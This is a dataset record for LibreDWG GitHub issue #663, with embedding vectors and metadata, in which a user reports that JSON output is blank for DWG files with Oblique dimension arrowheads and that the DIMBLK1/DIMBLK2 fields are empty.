-0.0019269923213869333, -0.005330607295036316, 0.0006446379702538252, 0.005297383293509483, -0.016538171097636223, 0.010882707312703133, -0.0054007465951144695, -0.0022167793940752745, -0.006659567356109619, 0.01678919792175293, 0.029665345326066017, 0.008837585337460041, -0.004319120664149523, -0.0019934403244405985, 0.0030787577852606773, 0.006493447348475456, 0.0028683391865342855, 0.016597237437963486, -0.006807229481637478, -0.0005597322015091777, 0.015445470809936523, 0.009420851245522499, 0.006497138645499945, 0.0050611235201358795, 0.01941758580505848, 0.010055799037218094, 0.013186238706111908, 0.004529539495706558, -0.02420184202492237, 0.01547500304877758, 0.005924947559833527, 0.0014175575925037265, -0.020229727029800415, -0.006951200310140848, -0.0028701848350465298, -0.00197867420502007, -0.000462828844320029, -0.0021614062134176493, 0.008933565579354763, -0.003643566044047475, -0.02463006228208542, -0.00019692144996952266, -0.011104200966656208, 0.0031322853174060583, 0.011451207101345062, 0.0025010292883962393, -0.005319532472640276, -0.02139625884592533, -0.01385071873664856, 0.031717851758003235 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
Hello, While trying to read the arrowheads of dimensions I encountered some problems. I have created various .dwg files just for testing purposes, each one has different arrowheads: You can find them inside the attached file [test.zip](https://github.com/LibreDWG/libredwg/files/11003424/test.zip). For example: - ah_dot_dot has a Dot arrowhead on the left and on the right, - ah_dot_oblique has a Dot arrowhead on the left and an Oblique arrowhead on the right - ... First, if there is an Oblique arrowhead the generated .json file is **blank**. I mean, the .json file is generated, but without any entities/tables. Adding the -v9 argument shows many errors. Second, looking at the DXF reference, the left arrowhead and the right arrowhead handles should be stored within the associated DIMSTYLE, in the **DIMBLK1 and DIMBLK2** fields, respectively. But they are **empty** every time, is this normal? (I could be wrong here, they might be stored only if an override is happening, but I'm not sure) Thanks, Dave
Problems with dimension arrowheads
https://api.github.com/repos/LibreDWG/libredwg/issues/663/comments
7
2023-03-17T16:15:39
2023-03-26T09:50:19Z
https://github.com/LibreDWG/libredwg/issues/663
1,629,581,270
663
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Problems with dimension arrowheads Issue date: --- start body --- Hello, While trying to read the arrowheads of dimensions I encountered some problems. I have created various .dwg files just for testing purposes, each one has different arrowheads: You can find them inside the attached file [test.zip](https://github.com/LibreDWG/libredwg/files/11003424/test.zip). For example: - ah_dot_dot has a Dot arrowhead on the left and on the right, - ah_dot_oblique has a Dot arrowhead on the left and an Oblique arrowhead on the right - ... First, if there is an Oblique arrowhead the generated .json file is **blank**. I mean, the .json file is generated, but without any entities/tables. Adding the -v9 argument shows many errors. Second, looking at the DXF reference, the left arrowhead and the right arrowhead handles should be stored within the associated DIMSTYLE, in the **DIMBLK1 and DIMBLK2** fields, respectively. But they are **empty** every time, is this normal? (I could be wrong here, they might be stored only if an override is happening, but I'm not sure) Thanks, Dave --- end body ---
1,185
[ -0.026248298585414886, 0.020379113033413887, -0.018292292952537537, 0.0328674353659153, 0.035247717052698135, 0.023802805691957474, 0.021976836025714874, 0.04675783962011337, -0.015235425904393196, -0.011257422156631947, 0.03115558996796608, -0.0045119356364011765, -0.005029565189033747, 0.002088859211653471, -0.018602054566144943, 0.03844315931200981, -0.010018371976912022, 0.024422330781817436, 0.0009629131527617574, -0.014012678526341915, 0.004597527906298637, 0.0019757552072405815, -0.018308596685528755, 0.0414755716919899, 0.0045689973048865795, 0.046986084431409836, 0.005245584063231945, -0.02461796998977661, -0.026818914338946342, 0.029150284826755524, -0.01879769377410412, 0.014974572695791721, 0.038508374243974686, -0.005054020322859287, 0.045323148369789124, 0.021438827738165855, 0.01499087642878294, 0.05014892295002937, -0.025514651089906693, 0.008269844576716423, -0.06097430735826492, -0.06410454213619232, -0.020525842905044556, 0.015504430048167706, -0.03012848272919655, 0.0004035064484924078, 0.005914018955081701, 0.02044432796537876, -0.020819302648305893, 0.002410849090665579, -0.023541951552033424, -0.03586724027991295, -0.03087843395769596, -0.023688681423664093, 0.006056672427803278, -0.016873905435204506, 0.03197075426578522, 0.04392106458544731, 0.001993077341467142, -0.01472187228500843, -0.004589376505464315, 0.009390695951879025, -0.013385001569986343, 0.03606288135051727, -0.031122982501983643, 0.009985765442252159, -0.027960143983364105, 0.05151839926838875, -0.02072148211300373, 0.009333633817732334, 0.016123954206705093, -0.014876753091812134, 0.019384613260626793, 0.015276183374226093, 0.025873323902487755, -0.06306113302707672, 0.03358478099107742, 0.02463427372276783, 0.008396195247769356, 0.014697416685521603, -0.0021479586139321327, 0.025987446308135986, -0.0220420490950346, 0.028220996260643005, -0.009333633817732334, -0.007348708342760801, -0.047768641263246536, -0.06403932720422745, -0.052855268120765686, 0.0009715742780826986, -0.015920164063572884, 0.01263505034148693, 0.013800735585391521, -0.06945201754570007, -0.01237419806420803, -0.021813804283738136, -0.00423070415854454, 0.0018066084012389183, -0.019205277785658836, -0.015846798196434975, -0.022775698453187943, -0.021308401599526405, -0.027960143983364105, 0.03453037142753601, -0.011224815621972084, -0.0036825058050453663, 0.012545382604002953, -0.011567184701561928, -0.009089085273444653, 0.09742847084999084, 0.005583877209573984, 0.016295138746500015, -0.0186509657651186, -0.001425519003532827, -0.01595276966691017, 0.014713720418512821, 0.026786306872963905, -0.055333368480205536, -0.01695542223751545, 0.0068840645253658295, -0.0333891399204731, -0.006211553700268269, -0.00023754405265208334, -0.004764636978507042, -0.03658458590507507, 0.016841299831867218, -0.018178170546889305, -0.021161671727895737, 0.011811734177172184, -0.018292292952537537, -0.030193695798516273, -0.03374781087040901, 0.010800930671393871, -0.009855339303612709, -0.03466079756617546, -0.013156755827367306, -0.01413495372980833, 0.004434495232999325, -0.028840521350502968, 0.004744257777929306, -0.04783385619521141, -0.0918201357126236, 0.00828207191079855, -0.012480169534683228, -0.03400866687297821, -0.007854110561311245, -0.005844729952514172, 0.021275794133543968, -0.005001034587621689, 0.009382544085383415, -0.007316101808100939, -0.02437341958284378, 0.02165077067911625, 0.0030059192795306444, 0.048420775681734085, -0.0399104580283165, -0.010784626938402653, -0.004874683916568756, -0.011950312182307243, -0.03288373723626137, 0.013197514228522778, -0.00045088789192959666, 0.01733039878308773, 0.009879793971776962, -0.025465739890933037, -0.006187099032104015, -0.004128808621317148, 0.004915442317724228, -0.01641741394996643, 0.014730023220181465, 0.01719997264444828, -0.0022885745856910944, 0.016572294756770134, -0.004147149622440338, -0.05027934908866882, 0.00031485731597058475, -0.02399844489991665, -0.01232528779655695, 0.0035581933334469795, -0.03739975020289421, -0.031334925442934036, -0.013759978115558624, -0.0010265979217365384, 0.01889551430940628, 0.04114950820803642, -0.028856825083494186, 0.05471384525299072, -0.01622992567718029, -0.008322830311954021, -0.004073784686625004, -0.0022315129172056913, 0.0017770587000995874, 0.009406998753547668, -0.004373357631266117, 0.007303874474018812, -0.009260269813239574, -0.024406027048826218, -0.04470362514257431, -0.009023871272802353, -0.023395223543047905, 0.031057769432663918, 0.006325677037239075, -0.01107808668166399, -0.021145367994904518, 0.02215617336332798, 0.022612664848566055, 0.007845958694815636, 0.010507470928132534, -0.0012370122130960226, -0.030682794749736786, -0.011640549637377262, -0.024161476641893387, 0.00886899046599865, 0.018732480704784393, -0.012667656876146793, 0.038769226521253586, 0.016776086762547493, 0.013270879164338112, -0.010271073319017887, -0.031074073165655136, 0.023150673136115074, -0.03247615694999695, 0.009561880491673946, 0.010784626938402653, -0.04871423542499542, 0.0008650933741591871, -0.027161283418536186, 0.018292292952537537, -0.02333001047372818, -0.00970860943198204, 0.06971286982297897, -0.03185662999749184, 0.02165077067911625, 0.01407789159566164, -0.029557866975665092, 0.002549427095800638, -0.031889237463474274, -0.0002835244231391698, -0.028742702677845955, -0.010662352666258812, -0.0234767384827137, 0.013303485698997974, -0.019237883388996124, -0.03231312334537506, 0.0346934050321579, 0.030454548075795174, 0.01106993481516838, 0.004065633285790682, 0.01733039878308773, 0.012455714866518974, 0.0352151095867157, -0.009570032358169556, 0.027308013290166855, -0.0036702784709632397, 0.021536648273468018, 0.027030857279896736, 0.014330592937767506, 0.04134514555335045, 0.011697611771523952, -0.018536841496825218, 0.020770393311977386, 0.01980849914252758, -0.037073682993650436, 0.005302645266056061, 0.000015387822713819332, -0.011909553781151772, -0.013874100521206856, -0.024732092395424843, -0.04874683916568756, -0.04362760856747627, 0.0220420490950346, 0.013303485698997974, -0.025889625772833824, 0.00963524542748928, -0.01848793216049671, 0.012529078871011734, 0.033307623118162155, -0.026884127408266068, 0.030959950760006905, -0.0016721063293516636, -0.007923399098217487, 0.003478714730590582, 0.01622992567718029, -0.0002380535297561437, -0.03219899907708168, 0.029541563242673874, 0.0023741668555885553, -0.0002901476400438696, -0.027976447716355324, 0.004964352119714022, -0.0001247583859367296, -0.0341716967523098, 0.02228659950196743, -0.0341716967523098, 0.00398207874968648, -0.005388237535953522, 0.021569253876805305, -0.035899847745895386, -0.0022559678182005882, -0.029753506183624268, -0.006537619978189468, 0.016409263014793396, -0.02138991840183735, 0.004740181844681501, 0.021406222134828568, -0.021585557609796524, -0.01839011162519455, 0.027210192754864693, -0.023281099274754524, -0.00654577137902379, -0.020558450371026993, -0.039812635630369186, -0.005710227880626917, -0.021324705332517624, -0.010124343447387218, -0.035541173070669174, 0.03320980444550514, -0.010091736912727356, 0.01967807300388813, -0.016319595277309418, -0.025726594030857086, -0.028351422399282455, -0.06977808475494385, 0.028253603726625443, 0.01663750782608986, -0.018341202288866043, -0.029541563242673874, 0.00010788193321786821, -0.03247615694999695, -0.01786840707063675, 0.0024414178915321827, -0.002345636021345854, -0.023753894492983818, -0.010050979442894459, 0.0009297970682382584, -0.048812054097652435, -0.01863466203212738, -0.019449826329946518, 0.005107006058096886, -0.020509541034698486, -0.007544348016381264, 0.02947635017335415, -0.03247615694999695, -0.03384563326835632, 0.055202942341566086, -0.05305090919137001, -0.009537424892187119, -0.007124538067728281, 0.04395367205142975, 0.01679239049553871, 0.0010546190897002816, 0.05565943568944931, -0.024194084107875824, 0.010556381195783615, -0.00072855333564803, -0.028106873854994774, 0.005824350751936436, -0.07466907054185867, 0.02124318853020668, 0.027422135695815086, -0.021585557609796524, -0.001496845972724259, 0.011175906285643578, 0.04336675629019737, 0.009089085273444653, 0.015072392299771309, -0.012667656876146793, -0.004760561045259237, -0.05552900955080986, -0.010417803190648556, -0.044116705656051636, 0.005587953142821789, -0.026802610605955124, -0.027422135695815086, -0.04180163890123367, -0.034432552754879, 0.03453037142753601, 0.008172024972736835, 0.008909748867154121, 0.0029468198772519827, -0.046986084431409836, 0.009260269813239574, 0.005502360872924328, -0.025857020169496536, 0.02399844489991665, 0.024927731603384018, -0.00560425641015172, 0.017574947327375412, 0.0027858249377459288, -0.01850423589348793, -0.016555992886424065, 0.024406027048826218, 0.017574947327375412, -0.02163446694612503, 0.01166500523686409, 0.0253027081489563, -0.008657047525048256, -0.002630943665280938, 0.020248686894774437, 0.006998187862336636, 0.0003596913593355566, 0.04108429327607155, -0.01602613553404808, 0.004630134906619787, -0.005066247656941414, 0.018047742545604706, -0.006729183252900839, -0.0016578409122303128, 0.010809081606566906, 0.012545382604002953, -0.019596556201577187, 0.005090702790766954, -0.0009761595283634961, -0.011184058152139187, 0.008123114705085754, 0.008852686733007431, -0.021161671727895737, 0.03210118040442467, -0.02605265937745571, -0.00360098946839571, 0.008066053502261639, -0.01914006471633911, -0.031220803037285805, 0.0023700909223407507, -0.014648507349193096, -0.0078255794942379, -0.021601861342787743, 0.016450021415948868, 0.0709519237279892, -0.03185662999749184, -0.0215203445404768, 0.0018646889366209507, 0.029378531500697136, -0.0003054319822695106, -0.043073296546936035, -0.00492359371855855, -0.0001041245341184549, -0.0006312430487014353, -0.015871254727244377, 0.007813352160155773, 0.0012512776302173734, 0.014501777477562428, -0.01785210333764553, -0.026525454595685005, 0.02830251306295395, -0.008559227921068668, -0.031595777720212936, 0.00211535207927227, 0.008485862985253334, -0.0032993785571306944, -0.001431632786989212, 0.02491142973303795, -0.0362585186958313, -0.012944812886416912, -0.00551051227375865, 0.0033666295930743217, 0.007532120682299137, -0.020917123183608055, 0.019890015944838524, -0.02778080850839615, -0.01349097304046154, 0.021014941856265068, -0.015740826725959778, 0.010189556516706944, 0.0613003745675087, 0.0028958721086382866, 0.041247326880693436, -0.03337283805012703, 0.010841689072549343, 0.02983502298593521, -0.00395558588206768, 0.013507276773452759, 0.018015136942267418, 0.010466712526977062, -0.006215629633516073, 0.0357368141412735, -0.003931131213903427, -0.003676392138004303, -0.004092126153409481, -0.006566150579601526, 0.0053719342686235905, -0.033552173525094986, 0.03479122370481491, -0.000986349070444703, 0.007173448335379362, 0.009113539941608906, 0.02463427372276783, -0.00977382343262434, -0.020183473825454712, 0.03557378053665161, 0.03635634109377861, 0.017411915585398674, -0.022628968581557274, -0.02021608129143715, -0.011102541349828243, 0.06449581682682037, -0.010898750275373459, -0.01265135407447815, 0.031872935593128204, 0.014966420829296112, 0.020917123183608055, -0.004047291819006205, 0.004744257777929306, 0.012675808742642403, 0.052203137427568436, -0.002924402942880988, -0.05200750008225441, 0.047116510570049286, -0.004707575310021639, -0.019368309527635574, 0.019971530884504318, -0.05777886509895325, -0.00886083859950304, -0.031106678768992424, -0.0015936467098072171, -0.024161476641893387, -0.003146535251289606, 0.009733065031468868, 0.0098471874371171, 0.012537230737507343, -0.003342174692079425, -0.02751995623111725, -0.027014553546905518, 0.044605802744627, -0.009512970224022865, 0.005714303348213434, 0.00904832687228918, -0.0212594922631979, 0.012366046197712421, -0.0198248028755188, -0.0031587625853717327, -0.009790126234292984, -0.004098239820450544, 0.01120851282030344, -0.02983502298593521, 0.03063388355076313, -0.02370498515665531, 0.06113734096288681, 0.020053047686815262, 0.008950507268309593, 0.014224621467292309, 0.023166976869106293, -0.019906317815184593, 0.03138383477926254, 0.023378919810056686, 0.00670880451798439, -0.020362811163067818, 0.0058732605539262295, 0.009945007972419262, -0.051290154457092285, -0.014730023220181465, -0.019596556201577187, -0.004838001448661089, -0.010271073319017887, -0.015920164063572884, 0.011885099112987518, 0.0006816813838668168, 0.01995522901415825, 0.018064046278595924, -0.013784432783722878, -0.012586141005158424, 0.026492848992347717, 0.00846140831708908, -0.0021846410818398, -0.005767289083451033, -0.012659505940973759, -0.009162449277937412, 0.0404321625828743, -0.008335057646036148, -0.022449631243944168, 0.011012873612344265, 0.0033340230584144592, -0.006782168988138437, -0.003564307000488043, -0.021976836025714874, -0.0116079431027174, 0.02592223323881626, -0.022319205105304718, -0.016523385420441628, -0.009822732768952847, 0.04013870283961296, -0.04992067813873291, -0.01785210333764553, -0.03087843395769596, 0.011844340711832047, 0.010833537206053734, 0.012406804598867893, -0.017232578247785568, -0.003556155366823077, -0.018977031111717224, 0.000031794603273738176, 0.04405149444937706, 0.03063388355076313, 0.005102930124849081, 0.042812444269657135, -0.01615656167268753, -0.034628190100193024, 0.012928510084748268, 0.03854098170995712, -0.004516011569648981, -0.00017500563990324736, 0.027193889021873474, 0.017509734258055687, -0.005082550924271345, -0.03334023058414459, 0.003823121776804328, 0.005669469479471445, -0.008624440990388393, -0.011265574023127556, -0.018275989219546318, 0.007165296468883753, 0.01061344239860773, 0.03482383117079735, 0.001643575495108962, 0.04483405128121376, 0.016710873693227768, -0.038117095828056335, 0.016710873693227768, -0.033307623118162155, -0.022498542442917824, 0.026036355644464493, -0.019009636715054512, 0.009089085273444653, 0.0005349517450667918, -0.006786244921386242, 0.029541563242673874, 0.004385585431009531, -0.009814580902457237, -0.011713914573192596, -0.01680869236588478, -0.03270440176129341, -0.02333001047372818, -0.007434300612658262, -0.01035259012132883, 0.01264320220798254, 0.0367802232503891, 0.0220420490950346, 0.013425759971141815, 0.0038659179117530584, -0.0026390952989459038, -0.012667656876146793, 0.016759783029556274, -0.0014550687046721578, 0.019352005794644356, -0.02478100173175335, 0.0030303741805255413, 0.012626899406313896, 0.02487882226705551, 0.007903020828962326, 0.031204499304294586, -0.023770198225975037, -0.011852492578327656, -0.00019614897610154003, 0.006602833047509193, 0.019873712211847305, -0.013262727297842503, 0.002922364976257086, 0.039030078798532486, -0.012749173678457737, 0.012879599817097187, -0.010099888779222965, -0.011722066439688206, -0.035541173070669174, -0.0293459240347147, 0.016515234485268593, 0.011094389483332634, -0.004247007425874472, -0.018439022824168205, 0.04118211194872856, 0.021862713620066643, 0.01408604346215725, -0.002696156734600663, 0.018194472417235374, -0.014868601225316525, -0.016050590202212334, 0.003837387077510357, -0.003236203221604228, 0.013050784356892109, -0.03149795904755592, 0.004756485112011433, 0.0170858483761549, -0.022906124591827393, 0.018846604973077774, -0.009953158907592297, -0.016392959281802177, 0.006696576718240976, -0.007230509538203478, 0.01693912036716938, -0.0041430736891925335, -0.03792145475745201, -0.0033870087936520576, -0.013849645853042603, 0.00130426324903965, -0.012447563000023365, 0.008893445134162903, -0.009741216897964478, 0.007980461232364178, -0.0025351617950946093, -0.021292097866535187, -0.0035887619014829397, -0.03102516382932663, -0.0034481461625546217, 0.02947635017335415, -0.009032023139297962, 0.011885099112987518, -0.0038761075120419264, 0.0015498315915465355, -0.01719997264444828, 0.016857603564858437, 0.02124318853020668, -0.016148410737514496, -0.012317136861383915, 0.004442646633833647, 0.007140841335058212, 0.0015742866089567542, -0.01440395787358284, 0.0037456811405718327, 0.03259027749300003, -0.03482383117079735, -0.03138383477926254, -0.006639515515416861, -0.008640744723379612, 0.014583294279873371, -0.034758616238832474, 0.02644393779337406, 0.020297598093748093, 0.0006414325907826424, -0.002767483703792095, 0.0018096653511747718, 0.022107262164354324, -0.04317111521959305, -0.01453438401222229, 0.030845826491713524, 0.022987641394138336, -0.02634611912071705, 0.01706954650580883, 0.023688681423664093, -0.004780940245836973, 0.0375627838075161, -0.001926845172420144, 0.0015141681069508195, -0.02632981538772583, -0.015504430048167706, -0.038149699568748474, -0.0071693724021315575, 0.011632397770881653, 0.0013837418518960476, 0.0059303222224116325, -0.008632592856884003, -0.009692306630313396, 0.03743235766887665, -0.010385196655988693, 0.010214012116193771, 0.0030405637808144093, -0.006639515515416861, -0.01866726763546467, 0.036160700023174286, -0.002032816642895341, 0.01408604346215725, -0.008803777396678925, 0.003929093014448881, -0.0016211585607379675, -0.04535575583577156, 0.014281682670116425, 0.015398458577692509, -0.0020205890759825706, 0.015561491250991821, -0.010727565735578537, 0.012447563000023365, 0.01341760903596878, -0.013849645853042603, 0.05308351665735245, -0.019841104745864868, -0.006651742849498987, 0.00654577137902379, -0.02124318853020668, -0.018846604973077774, -0.03324241191148758, -0.0012910168152302504, -0.01367846131324768, -0.03919311240315437, -0.021357310935854912, -0.023770198225975037, 0.024944035336375237, 0.047116510570049286, -0.01093950867652893, 0.03596505895256996, -0.025335313752293587, 0.004073784686625004, -0.014387654140591621, 0.013841493986546993, -0.018862908706068993, 0.027960143983364105, -0.010857991874217987, 0.033307623118162155, -0.01705324277281761, 0.019188974052667618, 0.010931356810033321, -0.008163873106241226, 0.014901207759976387, 0.007369087543338537, -0.00524150812998414, -0.024161476641893387, -0.020379113033413887, -0.041769031435251236, -0.023493042215704918, -0.01035259012132883, 0.0346934050321579, -0.021976836025714874, 0.035541173070669174, 0.027699291706085205, 0.0005976175307296216, 0.017444521188735962, -0.00019551212608348578, -0.008420649915933609, -0.0014999028062447906, 0.008204631507396698, -0.023949535563588142, 0.014037134125828743, 0.0276503823697567, -0.0803426206111908, 0.010776475071907043, 0.02802535705268383, -0.023558255285024643, -0.03397605940699577, -0.024927731603384018, 0.0047116512432694435, -0.00827392004430294, 0.029019858688116074, 0.00043662250391207635, -0.012985571287572384, -0.004960276186466217, -0.007487286347895861, -0.007540272083133459, -0.023916928097605705, 0.02305285446345806, -0.0025779579300433397, 0.010694959200918674, -0.011982918716967106, 0.025628773495554924, -0.01736300438642502, -0.004377433564513922, -0.029688293114304543, -0.0039270552806556225, -0.003293264890089631, -0.01850423589348793, -0.01811295561492443, -0.006240084767341614, -0.006093354895710945, 0.05083366110920906, 0.041508179157972336, 0.0299980565905571, -0.00727126793935895, 0.02200944349169731, 0.004065633285790682, -0.0007214206270873547, -0.039812635630369186, 0.038149699568748474, -0.016857603564858437, -0.0299980565905571, 0.003969851415604353, 0.010784626938402653, -0.010963963344693184, -0.010662352666258812, 0.029753506183624268, 0.0030324121471494436, 0.00771960848942399, -0.021667074412107468, 0.0013715144013985991, 0.007568802684545517, -0.039160504937171936, -0.009928704239428043, 0.030046965926885605, -0.035149894654750824, -0.009349937550723553, -0.02267787791788578, -0.018813997507095337, -0.01035259012132883, 0.025710290297865868, 0.0024149250239133835, 0.02985132671892643, 0.0029957296792417765, -0.04134514555335045, -0.010344438254833221, 0.024210387840867043, -0.035899847745895386, -0.009822732768952847, -0.01585495099425316, -0.007275343872606754, -0.010996569879353046, -0.008070128969848156, -0.009211359545588493, -0.014632203616201878, 0.0024006597232073545, 0.004279613960534334, 0.06188729405403137, 0.02137361466884613, -0.041508179157972336, -0.017428217455744743, 0.013376850634813309, -0.013393153436481953, -0.020542146638035774, 0.03759538754820824, -0.025840716436505318, -0.004000420216470957, -0.014827843755483627, 0.004833925981074572, 0.02709607034921646, 0.008343209512531757, 0.018194472417235374, 0.014387654140591621, -0.015545188449323177, 0.03400866687297821, 0.005922170355916023, -0.011779127642512321, -0.02333001047372818, -0.042942870408296585, 0.018455324694514275, -0.0045037842355668545, 0.01296111661940813, -0.02461796998977661, 0.03281852602958679, -0.0011870834277942777, 0.03185662999749184, 0.0025983371306210756, -0.011037328280508518, -0.045420970767736435, 0.02385171502828598, 0.007206054870039225, 0.012472017668187618, 0.00824538990855217, 0.00485430471599102, 0.016539689153432846, -0.002410849090665579, 0.018585752695798874, -0.016645660623908043, -0.01563485711812973, 0.011722066439688206, 0.0066680461168289185, -0.042584195733070374, 0.029916539788246155, 0.04688826575875282, -0.007507665548473597, -0.01133893895894289, -0.0172162763774395, 0.007312025874853134, -0.02437341958284378, -0.011754672974348068, 0.012610595673322678, -0.009814580902457237, 0.02737322635948658, 0.0014102347195148468, -0.035671599209308624, 0.011836189776659012, 0.0019655656069517136, 0.015993528068065643, -0.01407789159566164, -0.006130037363618612, 0.01323012076318264, 0.014363199472427368, -0.013857797719538212, 0.043595001101493835, -0.0016272722277790308, -0.0029468198772519827, -0.024797305464744568, 0.008705957792699337, -0.015349548310041428, 0.009602638892829418, -0.019058547914028168, -0.0011116806417703629, -0.011004721745848656, 0.005318948533385992, -0.006729183252900839, 0.011844340711832047, -0.03374781087040901, 0.030829522758722305, 0.020004138350486755, 0.0034501838963478804, -0.0029305166099220514, -0.0030935495160520077, -0.02659066766500473, -0.0018341202521696687, -0.0047972435131669044, 0.009007568471133709, 0.0121948616579175, -0.013279031030833721, 0.018602054566144943, 0.03048715367913246, -0.002867341274395585, 0.018928121775388718, -0.03925832360982895, -0.020395416766405106, 0.010108040645718575, -0.008147569373250008, 0.012765477411448956, -0.002300801919773221, 0.004915442317724228, -0.010955811478197575, -0.01822707988321781, 0.010768324136734009, 0.003044639714062214, 0.03167729452252388, -0.00045063314610160887, 0.005049944389611483, -0.03185662999749184, 0.005074399523437023, 0.00683923065662384, -0.0021072004456073046, -0.019058547914028168, -0.005473829805850983, 0.000489353493321687, 0.016857603564858437, 0.022612664848566055, -0.024992944672703743, -0.02112906612455845, 0.0017658502329140902, -0.0047972435131669044, -0.04652959108352661, 0.011045480147004128, 0.0223029013723135, -0.017786890268325806, 0.0004162433906458318, -0.007731835823506117, 0.0010902825742959976, -0.012333439663052559, 0.013523579575121403, -0.00977382343262434, -0.024047354236245155, 0.03151426091790199, -0.012023677118122578, -0.005343403667211533, -0.001973717240616679, 0.010670503601431847, -0.03691064938902855, -0.0063093737699091434, -0.01641741394996643, -0.004988807253539562, -0.059767864644527435, -0.010972115211188793, 0.011885099112987518, 0.02748734876513481, 0.024194084107875824, -0.014566990546882153, 0.0005976175307296216, -0.005836578086018562, 0.014868601225316525, 0.012577989138662815, 0.01368661317974329, -0.008559227921068668, 0.006456103175878525, 0.01349097304046154, 0.0119340093806386, 0.04780124872922897, -0.004931745585054159, 0.0055064368061721325, -0.004564921371638775, -0.004907290451228619, -0.02256375551223755, 0.007907096296548843, 0.004332599695771933, -0.01048301625996828, -0.006806624121963978, -0.0037191882729530334, 0.012806234881281853, -0.015096847899258137, 0.01115145068615675, -0.011371545493602753, 0.005098854191601276, -0.011404152028262615, -0.0012145951623097062, 0.012561685405671597, 0.039943061769008636, -0.010425955057144165, -0.0033808948937803507, -0.015219122171401978, -0.0025249721948057413, 0.02318328060209751, 0.0018504235194996, -0.018977031111717224, -0.012822538614273071, 0.00008934967627283186, -0.008885293267667294, 0.0023599013220518827, 0.008771170862019062, -0.02973720245063305, 0.040497373789548874, 0.030796917155385017, 0.012732869945466518, -0.01811295561492443, -0.038377948105335236, -0.024797305464744568, -0.0170858483761549, -0.01785210333764553, 0.006435723975300789, -0.023362616077065468, -0.0438232459127903, 0.01427353173494339, 0.10316722840070724, 0.04238855838775635, 0.015007179230451584, -0.002704308368265629, -0.006835154723376036, -0.005783592350780964, 0.015585945919156075, 0.004687196109443903, 0.0010174273047596216, -0.011428606696426868, 0.017020635306835175, -0.005698000080883503, -0.005918094888329506, 0.017917316406965256, 0.031237104907631874, -0.023770198225975037, -0.013393153436481953, -0.020884515717625618, 0.028595972806215286, -0.016425566747784615, -0.014257228001952171, -0.013173059560358524, -0.00818017590790987, -0.04114950820803642, 0.03262288495898247, 0.0007540272199548781, 0.006932974327355623, -0.005327100399881601, -0.008551076054573059, -0.009195055812597275, -0.00011469620221760124, 0.00029065710259601474, -0.00791117176413536, -0.005771365016698837, 0.000030632356356363744, 0.011510123498737812, 0.0022885745856910944, -0.008412498049438, -0.005029565189033747, 0.04082344099879265, -0.006513164844363928, -0.006990035995841026, 0.021422524005174637, -0.01954764686524868, -0.01205628365278244, -0.0005823331885039806, 0.001431632786989212, 0.016401110216975212, -0.025710290297865868, -0.02033020369708538, -0.00912984274327755, -0.02973720245063305, 0.008172024972736835, 0.008551076054573059, -0.010784626938402653, 0.016075044870376587, 0.0006684349500574172, -0.0005451412871479988, -0.0018952576210722327, -0.004780940245836973, -0.004842077381908894, 0.00030364879057742655, -0.00582842668518424, -0.000765745178796351, 0.0013541921507567167, -0.0007081741932779551, -0.03909529373049736, 0.012317136861383915, -0.007499514147639275, 0.02253114804625511, -0.013596944510936737, 0.012268226593732834, 0.004010609816759825, -0.014787085354328156, 0.014110498130321503, 0.029818719252943993, 0.022792000323534012, 0.04000827670097351, -0.002948857843875885, -0.013124149292707443, 0.03219899907708168, 0.010271073319017887, -0.011828037910163403, 0.02631351165473461, 0.0019706604070961475, -0.00021665544772986323, -0.00762586435303092, -0.026085264980793, -0.015137605369091034, -0.02709607034921646, -0.003034450113773346, 0.00654577137902379, 0.014346896670758724, -0.010059130378067493, -0.008123114705085754, -0.01296926848590374, 0.011762824840843678, 0.012080738320946693, -0.013010025955736637, 0.005983307957649231, -0.006981884595006704, -0.012985571287572384, 0.024976642802357674, 0.0015854950761422515, -0.009480363689363003, -0.007458755746483803, 0.017672767862677574, 0.01956394873559475, -0.0050051105208694935, -0.0305197611451149, -0.0264765452593565, 0.0262156929820776, 0.010605290532112122, -0.01061344239860773, -0.017640160396695137, 0.03249245882034302, 0.013311637565493584, -0.004263310693204403, 0.0026431709993630648, -0.017949923872947693, -0.02761777490377426, -0.00485430471599102, 0.028237299993634224, -0.023541951552033424, 0.009504818357527256, 0.002846962306648493, -0.019987834617495537, -0.013898556120693684, -0.005522740073502064, 0.009814580902457237, 0.029280710965394974, 0.0005639919545501471, 0.010344438254833221, -0.014518081210553646, 0.031872935593128204, -0.0052129775285720825, 0.01995522901415825, 0.0055798012763261795, -0.0104341059923172, -0.007768518291413784, -0.0354759618639946, 0.016009831801056862, 0.021552950143814087, 0.03430212289094925, 0.013083390891551971, -0.013637702912092209, -0.010646048933267593, -0.0014071777695789933, 0.003342174692079425, 0.05552900955080986, -0.00488691171631217, -0.03766060248017311, 0.04118211194872856, 0.013865948654711246, -0.006138189230114222, 0.01679239049553871, 0.00632160110399127, 0.003331985091790557, -0.010018371976912022, -0.008640744723379612, -0.004283689893782139, -0.010711262002587318, 0.036291126161813736, -0.02593853697180748, 0.0029305166099220514, 0.00899126473814249, 0.007458755746483803, -0.01902594044804573, -0.0267373975366354, -0.04030173644423485, 0.012488321401178837, -0.02254745177924633, -0.0033870087936520576, -0.005054020322859287, 0.03867140784859657, -0.007336481008678675, 0.006688425317406654, -0.00818832777440548, -0.0014051399193704128, -0.017656464129686356, 0.016857603564858437, -0.01602613553404808, 0.005037717055529356, 0.016686419025063515, 0.007120462600141764, -0.013246424496173859, 0.034497763961553574, -0.020509541034698486, -0.020754089578986168, 0.004475253634154797, 0.010108040645718575, 0.02543313428759575, -0.008200555108487606, -0.014599597081542015, 0.01121666468679905, -0.014640355482697487, 0.002938668243587017, 0.012105193920433521, 0.012569837272167206, 0.0007091931765899062, -0.0005594067042693496, 0.005706151947379112, 0.02448754385113716, -0.030959950760006905, 0.02319958247244358, -0.03397605940699577, 0.0036580509040504694, -0.004528238903731108, 0.014787085354328156, -0.02672109380364418, 0.005074399523437023, 0.0035215108655393124, -0.012757325544953346, -0.027177587151527405, -0.009023871272802353, -0.012749173678457737, -0.004471177700906992, -0.017558645457029343, 0.018748784437775612, 0.0009109464008361101, 0.0008044654969125986, -0.0019676033407449722, 0.013776280917227268, 0.024797305464744568, 0.011567184701561928, 0.013181210495531559, 0.0269982498139143, -0.0375627838075161, -0.009227662347257137, 0.01660490222275257, 0.008901597000658512, -0.0011707800440490246, 0.014770781621336937, 0.01159979123622179, 0.004033026751130819, -0.017819497734308243, 0.01927049085497856, -0.02215617336332798, 0.02867748960852623, -0.03387824073433876, -0.010132495313882828, -0.011510123498737812, 